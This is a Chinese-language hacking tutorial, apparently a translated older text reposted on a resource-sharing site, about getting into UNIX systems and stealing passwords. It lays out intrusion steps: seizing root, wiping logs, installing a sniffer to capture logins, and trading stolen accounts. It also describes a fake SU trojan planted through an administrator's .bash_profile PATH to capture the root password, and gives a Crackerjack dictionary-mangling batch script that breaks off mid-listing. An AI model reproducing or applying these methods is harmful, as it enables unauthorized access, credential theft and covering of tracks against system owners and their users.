也想出现在这里? 联系我们

从UNIX系统获取密码档(二)

作者 : 小编 本文共4815个字,预计阅读时间需要13分钟 发布时间: 2021-06-23 共5.39K人阅读
也想出现在这里? 联系我们

主题:

破解(Cracking)passwrd 文档

与新手交谈

困难的方法

利用mount命令获取访问权限

有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需的只是一个好的帐号,用来获得数百个帐号.想一想这:你进入一个很好的可以利用的系统(大多是Linux机器;),夺取root权限并装上一个Sniffer(嗅探器);这个TCP sniffer 将监测到网络上任何login(登陆)过程并记录下所有Telnet,Ftp或拨号进出的Login 名和口令;这样即使是一个小以太网你也可获得大约100个口令,如果是一个更大的网络供应商你就会得到全世界的数百个帐号!这一切,你只要有某个可利用系统的一个好帐号和口令就可做到!如果你看起来无法利用某系统的root权限,那就拿它来破解口令,用来和那些但没有shell帐号或磁盘空间的其他hacker及IRC使用者交换.决不要把一个你有root权限的系统的口令给出去!你自己留着它!

OK,让我们开始深入获取你的第一个帐号的方法.Go!

——————————————————————————–

破解passwd 文档

 

如果你是按照心中正确的框架去hacking的话,一般都是先运行破解程序直到得到一个可以进入此系统的好帐号.然后Login上去看看能否夺取系统的root权限.如果可以,拿了root,移取用得着的文档到你的子目录里,抹去你的在场痕迹,清除所有日志.这样就准备好可以安装Sniffer了.

为何要去破解那些只用24小时就可破解出大部分口令的系统?我们的目的不仅仅是正在hack的机器,还有那些与之相连的机器.如果某系统没有利用价值,不要在它上面浪费时间,去寻找下一个目标.后注:如果你仅仅是为了得到上面所说的交换帐号的口令那又另当别论.

得到一个管理员的帐号后,你可能会想读一读他的历史文档,看看他是否曾用过SU命令成为root.如果有,你就可以用SU特洛伊木马帮你夺取root口令.它如此工作:你更改他(管理员)的Shell脚本使得一隐藏目录(.term)被很好安置在搜寻路径里所有目录之前.把伪SU程序放在该.term(或其他)目录里.他键下SU,对他来说一切都如常,在提示下他键入root口令,然后口令就悄悄地被拷贝到/tmp/.elm69的log文档里,同时删除伪SU文件,并返回一个摽诹畲頂的信息让他再试一次.管理员一定认为是他输入错了,便再次运行SU,但这回是真的SU了.

在后面的uuencode过的附录里,你可找到假SU程序.

 

这是DOC文档:

Fake SU by Nfin8 – i-e

IRC: /msg i-e

Easy as 1,2,3 ...

1.更改路径到你已有访问权限的用户帐号上,此前你应已从历史文档中看到他曾用过SU命令;先建立放SU特洛伊程序的目录.最好是.term或.elm.

2.确定已编辑过su.c的头部指向你所用路径,使得SU特洛伊可自我删除并在第二次尝试让真SU程序运行.

3.把所有文件放进目标目录,并编译su.c.

gcc su.c -o su

然后删除SU以外的所有文件.一切搞定!

.bash_profile 结构如下:

# .bash_profile

# Get the aliases and functions

if [ -f ~/.bashrc ]; then

. ~/.bashrc

fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

ENV=$HOME/.bashrc

USERNAME=""

export USERNAME ENV PATH

把第一行改为:PATH=$HOME/.term:$PATH:$HOME/bin

当系统管理员运行SU时,就会先运行在.term里的SU特洛伊然后报告口令出错.SU特洛伊程序会在/tmp目录创建包含键入的root口令(或帐户口令)的隐藏文件.如果是非root帐户,它还记录帐户名.然后SU特洛伊自我删除使得下次尝试将运行真正的SU程序.

你可在/etc目录下的passwd文档前部找到管理员的用户名.只需打:more passwd

你可确信passwd文档的头一二个帐户就是管理员的,虽然有时你也能找到其他人的目录如/staff/username.

历史文档在每个用户目录里.通过阅读它们,你可看到该用户最近使用过的命令,有时能看到最近的100多个命令.寻找.bash_history或history文件,你可用more命令读它们:more .bash_history,也可:more .b*或more .b(然后按键盘上的Tab键).

OK,现在你需要一个好的password破解程序.下一章你可看到在没有帐号时如何从系统夺取password文档.但是it is catch 22(我不懂了?:译者),你还是要用到password破解程序.

你需要下列三样东东:

1. Password破解程序

2. 好的字典档

3. Password 文档

初学者最好的password破解程序当数Crackerjack,搜寻Web页可以很容易找到它.Down下来准备开始.如果你已有所入门,可down一个unix版本的Cjack并在shell环境下运行它.但如你是初学,down一个DOS/OS/2版本好了.

此外还要找一些好字典档.最好的字典档就是名字(names)了.你会在网络上发现最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如\’familynames\’ \’babynames\’ \’girlsnames\’ \’boysnames\’ \’commonpasswords\’’ hackersdict’这样为名的字典档是最好的.

装载crackerjack如:[D:\\jack]jack

Cracker Jack version 1.4 for OS/2 and DOS (386)

Copyright (C) 1993, The Jackal, Denmark

PWfile(s) : domain.com.passwd

Wordfile : domain.com.passwd

上面把password文档作为字典档.这会让你先找出那些用登陆名(Login name)作口令的用户,如果用真名(real name )或公司名之类的信息的话,也能马上猜中.这样你就不用苦苦等候程序搜索整个字典档了.

 

如果想hash(我译做:扩充)字典档以得到更多的词量,可参读crackerjack的DOC文档.

所谓hashing(扩充)就是你可告诉crackerjack更改字典档中的词例如在单词的前后加一些数字或字母,就象sandy1或1sandy.你会发现很多用户这样做并以为这更可靠.

下面就是为口令文档和字典档写的hashing文件.通过观察它们,你就会明白你如何修改它们或创建新的hashing文件以满足自己的需要.

———— start of dicthash.bat

@echo off

cls

echo – THIS FILE FOR DOS MACHINES

echo ———————————————————————-

echo – To work this batch file have all of the crackerjack files in the

echo – current directory with this batch file, along with your dict and

echo – password file. Then use this batch file using the following format:

echo –

echo – dicthash.bat dictfilename.ext passwordfilename.ext

echo –

echo – Make sure to have the jpp.exe and jsort.exe files in your dir as well.

echo –

echo – dicthash will first load jack running the dict file against your

echo – password file in both cases, then it will add numbers 0-9 both to

echo – the begining and end of every dict word. This will take a while,

echo – so go out for that week vacation!

echo –

echo – If you get tired you can \’ctrl c\’ to the next option or number.

echo –

echo – ii@dormroom.pyro.net

echo –

echo – Mail me some of your hits, let me know how this works for you 😉

jpp -lower %1 | jack -stdin %2

jpp %1 | jack -stdin %2

jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2

jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2

jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2

jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2

jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2

jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2

jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2

jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2

jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2

jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2

jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2

jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2

jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2

jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2

jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2

jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2

jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2

jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2

jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2

jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2

jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2

jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2

jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2

jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2

jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2

jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 从UNIX系统获取密码档(二)

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录